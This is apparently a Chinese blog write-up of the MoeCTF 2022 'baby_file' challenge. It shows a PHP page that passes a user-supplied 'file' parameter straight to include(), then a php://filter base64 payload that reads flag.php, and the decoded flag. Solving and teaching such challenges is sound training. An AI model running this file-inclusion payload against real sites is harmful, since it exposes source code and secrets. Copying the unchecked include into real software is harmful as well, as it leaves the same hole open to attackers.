[MoeCTF 2022]baby_file

马船长2025-02-08 9:49

题目

复制代码 
<html>
<title>Here's a secret. Can you find it?</title>
<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}
?>
</html>

读取flag

复制代码 
/?file=php://filter/read=convert.base64-encode/resource=flag.php

使用bp解码

拿下flag

NSSCTF{00bb1bc4-f867-45af-b88b-02b18cd6725b};

相关推荐
AI袋鼠帝1 天前
火爆全网的Seedance2.0 十万人排队,我2分钟就用上了
前端
IT_陈寒1 天前
React Hooks闭包陷阱:你以为的state可能早就过期了
前端·人工智能·后端
Jenlybein1 天前
快速了解熟悉 Vite ,即刻上手使用
前端·javascript·vite
小码哥_常1 天前
安卓开发避坑指南:全局异常捕获与优雅处理实战
前端
lihaozecq1 天前
我用 1 天的时间 vibe coding 了一个多人德州扑克游戏
前端·react.js·ai编程
momo061171 天前
AI Skill是什么?
前端·ai编程
言萧凡_CookieBoty1 天前
用 AI 搞定用户系统:Superpowers 工程化开发教程
前端·ai编程
小小小小宇1 天前
Go 语言协程
前端
牛奶1 天前
5MB vs 4KB vs 无限大:浏览器存储谁更强?
前端·浏览器·indexeddb
牛奶1 天前
setTimeout设为0就马上执行?JS异步背后的秘密
前端·性能优化·promise
热门推荐
01GitHub 镜像站点02OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程03Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)04AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南05VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)06Claude Code 未登录 使用第三方模型07Oh My Codex 快速使用指南08UV安装并设置国内源09【技术干货】Gemma 4 上手深度指南:本地多模态大模型的新基线10最新更新版本,OpenClaw v2026.4.2 深度解读剖析:Task Flow 重磅回归与安全架构的全面硬化